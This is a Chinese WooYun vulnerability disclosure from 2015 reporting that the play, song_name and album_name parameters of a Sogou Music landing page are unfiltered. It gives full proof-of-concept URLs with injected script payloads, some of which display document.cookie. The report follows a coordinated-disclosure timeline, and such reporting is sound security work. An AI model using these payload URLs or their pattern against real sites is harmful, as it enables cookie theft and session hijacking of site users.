当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098749

漏洞标题:搜狗音乐引导页面再爆三处XSS(三个参数均未过滤)

相关厂商:搜狗

漏洞作者: 0x 80

提交时间:2015-03-02 10:04

修复时间:2015-04-16 10:06

公开时间:2015-04-16 10:06

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-16: 细节向公众公开

简要描述:

音乐引导页面再爆XSS

详细说明:

http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=%C3%CE%CF%EB%C6%F0%BA%BD&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play
这是一个引导的页面

6767.png


会自动弹出
http://y.qq.com/webplayer/player.html
======================================
其中&song_name=%C3%CE%CF%EB%C6%F0%BA%BD&参数是定义名字的
提交1看看
http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=1&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play=http%3A%2F%2Fcc.stream.qqmusic.qq.com%2FC1000044WSp92MU5AU.m4a%3Ffromtag%3D52
还是正在播放!
其中&play参数,与&song_name参数
都未过滤的!
1,&play是链接到网站的播放页面
直接插入XSS即可
http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=1&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C

78.png


543.png


2,再来尝试下&song_name参数
写入XSS即可

54321.png


http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&album_name=Heart%C3%CE+%B3%F6%B7%A2&singer_name=TFBOYS&play=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C
==============================================
最后检查下&album_name参数,看过滤没有
http://mp3.sogou.com/tiny/song?tid=82b855dc95e1be56&query=%C3%CE%CF%EB%C6%F0%BA%BD&song_name=1&album_name=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&singer_name=TFBOYS&play=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C
同样未过滤

漏洞证明:

34689.png

修复方案:

版权声明:转载请注明来源 0x 80@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-03-02 11:04

厂商回复:

感谢支持!

最新状态:

暂无